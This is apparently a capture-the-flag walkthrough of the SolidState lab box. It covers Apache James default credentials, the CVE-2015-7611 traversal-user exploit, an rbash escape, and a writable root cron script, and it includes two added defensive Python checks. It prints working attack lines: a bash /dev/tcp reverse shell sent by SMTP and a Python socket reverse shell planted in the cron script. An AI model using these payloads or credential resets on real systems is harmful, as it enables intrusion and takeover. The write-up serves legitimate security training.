Target: 10.129.8.75
Enumeration
Starting off with our initial nmap scan with version detection:
$ nmap -sSV -p- -oA 1_init_nmap 10.129.8.75
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-01 21:12 EDT
Nmap scan report for 10.129.8.75
Host is up (0.048s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp open smtp?
80/tcp open http Apache httpd 2.4.25 ((Debian))
110/tcp open pop3?
119/tcp open nntp?
4555/tcp open rsip?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have a number of open ports, with OpenSSH 7.4p1 on 22/tcp and Apache httpd 2.4.25 on 80/tcp. The remaining ports do not appear to have been fingerprinted confidently.
25/tcp
Checking the first of the unidentified ports, I attempted to pull it with curl.
$ curl -IL 10.129.8.75:25
curl: (1) Received HTTP/0.9 when not allowed
Thinking it was an easy fix, I added --http0.9 as an arg, only to receive:
$ curl -IL --http0.9 10.129.8.75:25
curl: (8) Weird server reply
Finally, stripping out -IL returns some useful information:
$ curl --http0.9 10.129.8.75:25
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Mon, 1 Jun 2026 21:26:54 -0400 (EDT)
I tested the VRFY command for user enumeration with netcat -C 10.129.8.75 25, but the server says it is not allowed. An nmap script also fails, apparently because of an unusually long pause at the beginning before anything returns over the connection. searchsploit JAMES SMTP reveals a potential arbitrary file write / command execution exploit for Apache James Server 2.3.2, CVE-2015-7611. A write-up for this vulnerability explains that you must log in to the admin panel, create a user whose name is a directory traversal (adduser ../../../../../../../../etc/bash_completion.d exploit), and then send an email to this user containing the command you want to execute. When any user signs in, it will execute.
4555/tcp
As seen in the write-up, this port is the administration port for Apache James. The write-up also states that this software ships with the default credentials root:root. Sure enough, they worked, and we were able to use the adduser command to create the exploitable user:
$ nc -C 10.129.8.75 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
adduser ../../../../../../../../etc/bash_completion.d exploit
User ../../../../../../../../etc/bash_completion.d added
Exploitation
With the vulnerability discovered and prerequisite exploit user created, the final step is to send a payload to gain access to the machine.
$ nc -C 10.129.8.75 25
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Mon, 1 Jun 2026 21:57:02 -0400 (EDT)
HELO example.com
250 solidstate Hello example.com (x.x.x.x [x.x.x.x])
MAIL FROM:<[email protected]>
250 2.1.0 Sender <[email protected]> OK
RCPT TO: <../../../../../../../../etc/bash_completion.d>
250 2.1.5 Recipient <../../../../../../../../etc/bash_completion.d@localhost> OK
DATA
354 Ok Send data ending with <CRLF>.<CRLF>
/bin/bash -i >& /dev/tcp/x.x.x.x/4444 0>&1
.
250 2.6.0 Message received
QUIT
221 2.0.0 solidstate Service closing transmission channel
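The traversal user created on 4555 and the RCPT TO above only work because the mail server accepts a mailbox name that is really a filesystem path. The following is an added example, not code from the box, from Apache James or from this write-up: a small check a mail gateway or log-review script can apply to recipient local parts, run here over a constructed SMTP transcript.

```python
"""Flag SMTP recipients whose local part looks like a filesystem path.

Added example for this write-up (not code from the box or from Apache James).
Transcript lines below are constructed for the demo.
"""
import re

# Recipient in an SMTP "RCPT TO" command, with or without a space after the colon.
RCPT = re.compile(r"RCPT TO:\s*<(?P<addr>[^>]*)>", re.IGNORECASE)
# Strict allow-list for mailbox names. Narrower than RFC 5321 on purpose (a dot-atom
# may legally contain '/'): a local part that doubles as a directory name must never
# contain a path separator or start with a dot.
SAFE_LOCAL = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._+=-]{0,63}$")


def local_part_is_safe(local):
    """True if the mailbox name cannot escape the mail store when used as a path component."""
    if not SAFE_LOCAL.match(local):
        return False
    # ".." inside the name is rejected too; consecutive dots are not a valid mailbox anyway.
    return ".." not in local


def check_address(addr):
    """Return None if the address is acceptable, otherwise a short reason string."""
    local, _, _domain = addr.rpartition("@")
    if not local:          # no '@' at all: the whole string is the local part
        local = addr
    if not local_part_is_safe(local):
        return "local part is not a plain mailbox name: %r" % local
    return None


def scan_transcript(lines):
    """Return [(line_number, address, reason)] for every suspicious RCPT TO in a transcript."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = RCPT.search(line)
        if m:
            reason = check_address(m.group("addr"))
            if reason:
                hits.append((n, m.group("addr"), reason))
    return hits


# Constructed sample transcript; addresses are made up.
SAMPLE_TRANSCRIPT = [
    "MAIL FROM:<sender@example.com>",
    "RCPT TO:<john@localhost>",
    "RCPT TO: <../../../../../../../../etc/bash_completion.d>",
    "RCPT TO:<mindy@solid-state-security.com>",
]

if __name__ == "__main__":
    for n, addr, reason in scan_transcript(SAMPLE_TRANSCRIPT):
        print("line %d: %s (%s)" % (n, addr, reason))
```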
The payload has been sent, but triggering the reverse shell requires a user login. At this time I don't have any other users, so back to enumeration.
Enumeration Pt 2
Port 80 hosts a simple website using the SolidState theme. I mapped the IP to the solid-state-security.com domain seen in the footer and attempted a vhost scan, which didn't return anything legitimate.
A directory scan with gobuster dir -u http://solid-state-security.com -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -o 3_gobuster_dir.txt did not return anything new besides /assets and /images.
Connecting to OpenSSH prints a ** This session may be vulnerable to "store now, decrypt later" attacks. banner, which isn't really actionable. I tried some of the usernames from the mail server with various passwords such as mail, their own username, password and 1234, to no avail.
Port 119 can also be connected to via nc -C and turns out to be an NNTP service, a posting framework with nothing interesting on it.
Back on port 4555, logged in as root, HELP and then listusers reveal the additional users james, thomas, john, mindy and mailadmin. I reset all of their passwords to password.
Port 110 is a POP3 server. We can use USER <user>, PASS password and LIST to check for emails.
James and Thomas have no emails. John has one, which we can read with RETR 1; it says to restrict mindy's access and send her a temporary password. Switching to mindy's account, email 2 reveals the password P@55W0rd1!2@.
User Access
Upon logging in as mindy via SSH, I get spammed with a bunch of command not found messages. It looks like CVE-2015-7611 was a red herring and did not actually work here. Either way, user.txt is in our home directory.
I took a break for a day, so the IP from here on out has changed to 10.129.9.59. The IP in /etc/hosts has also been updated to reflect this change. My host IP also changed.
Credentialed Enumeration (rshell)
With user access as mindy, now we need to do further enumeration to determine how to privesc to root.
$ crontab -l
-rbash: crontab: command not found
$ sudo -l
-rbash: sudo: command not found
$ echo $SHELL
/bin/rbash
rbash is new to me: it's a restricted shell that limits the user to a whitelisted set of commands. ls -la ~/bin only contains cat, env and ls. Using / in a command is restricted.
Crucial commands (bash, ftp, gdb, python, man, vim, find, scp, php, perl, ruby, lua, sh, zip, tar, which) are all not found.
compgen -b reveals the binaries we have access to; there are not many. We also have some functions under compgen -A function. export -p shows our exported variables and which of them are read-only. Unfortunately PATH and SHELL are read-only.
We are able to cat /etc/passwd, which reveals a james user with bash as the default shell instead of rbash. Maybe the secret is to use a different username in the CVE-2015-7611 exploit than I did, as the /etc/bash_completion.d functionality is disabled in our .bashrc via the shopt -u progcomp line. Though I also see shopt -u mailwarn set, to disable mail checking?
Credentialed Enumeration (bash)
I ended up going back to my original payload above and sending an apostrophe ' before the actual command, and this time it latched when mindy logged in. whoami finally works, indicating we have somewhat more permissions even though $SHELL still indicates /bin/rbash.
I was able to cd /bin and exec bash. Using ./ps -p $$ indicates we are in bash.
I got lucky here by checking /opt first, a common place for user installed applications. I see the james-2.3.2 dir, but also a tmp.py owned by root but writable by anyone.
First, need to elevate from the dumb nc shell to an interactive tty. I followed the steps documented on my hackbook here.
Priv Esc
Once active, I ran nano tmp.py to edit.
I modified the script to look as follows:
import os
import sys
import pty
import socket
try:
s=socket.socket();s.connect(("x.x.x.x",4440));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")
except:
sys.exit()
I also launched the listener with nc -lvnp 4440
Unfortunately, launching the script ourselves still runs it as mindy. While I was searching online for a way to privesc, the listener captured a session as root!
Root
As root, we get the flag under /root/root.txt. crontab -l also shows that python /opt/tmp.py is run every 3 minutes.
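The root cause here is a root cron job pointing at a script anyone can write. As an added example (not code from the box or from this write-up), the audit below parses a user crontab in the format `crontab -l` prints and reports command paths that are world-writable or sit in a world-writable directory; build_demo() recreates the /opt/tmp.py situation in a constructed temp directory so it runs offline.

```python
"""Find cron jobs whose script a non-root user could edit.

Added example for this write-up, not code from the box. audit_crontab() takes
the text of a user crontab (five schedule fields, then the command); build_demo()
constructs a temp directory with one 0666 script and one 0755 script.
"""
import os
import re
import stat
import tempfile

# Five schedule fields, then the command (user crontab format, no user column).
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<cmd>.+)$")
# The interpreter binary is not what we audit; the script it is handed is.
INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "perl", "ruby"}


def audit_crontab(crontab_text):
    """Return [(path, problem)] for every absolute path in a command that others can modify."""
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#@" or "=" in line.split()[0]:
            continue  # comment, @reboot-style entry, or VAR=value assignment
        m = CRON_LINE.match(line)
        if not m:
            continue
        for tok in m.group("cmd").split():
            if not tok.startswith("/") or os.path.basename(tok) in INTERPRETERS:
                continue
            if not os.path.exists(tok):
                continue
            if os.stat(tok).st_mode & stat.S_IWOTH:
                findings.append((tok, "world-writable"))
            parent = os.stat(os.path.dirname(tok)).st_mode
            if parent & stat.S_IWOTH and not parent & stat.S_ISVTX:
                findings.append((tok, "parent directory world-writable without sticky bit"))
    return findings


def build_demo():
    """Constructed layout: a 0666 tmp.py (the bad case) and a 0755 backup.sh (fine)."""
    base = tempfile.mkdtemp()  # created 0700, so the directory itself is not a finding
    bad, good = os.path.join(base, "tmp.py"), os.path.join(base, "backup.sh")
    for path, mode in ((bad, 0o666), (good, 0o755)):
        with open(path, "w") as f:
            f.write("# placeholder\n")
        os.chmod(path, mode)
    crontab = "PATH=/usr/bin:/bin\n*/3 * * * * python %s\n0 2 * * * %s\n" % (bad, good)
    return crontab, bad


if __name__ == "__main__":
    text, _ = build_demo()
    for path, problem in audit_crontab(text):
        print("%s: %s" % (path, problem))
```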
Conclusion
This was a pretty challenging box for me, but I learned a lot about exploiting SMTP and escaping a restricted shell. I was actually on the right track and had initially sent the payload before I ever logged in as mindy, but my payload wasn't properly formed and failed to capture the reverse shell. It took me a bit of stumbling before I determined I needed to fix the payload for it to latch.
Escalation to root once the revshell in bash existed wasn't so bad. I got lucky stumbling into the file in /opt quickly.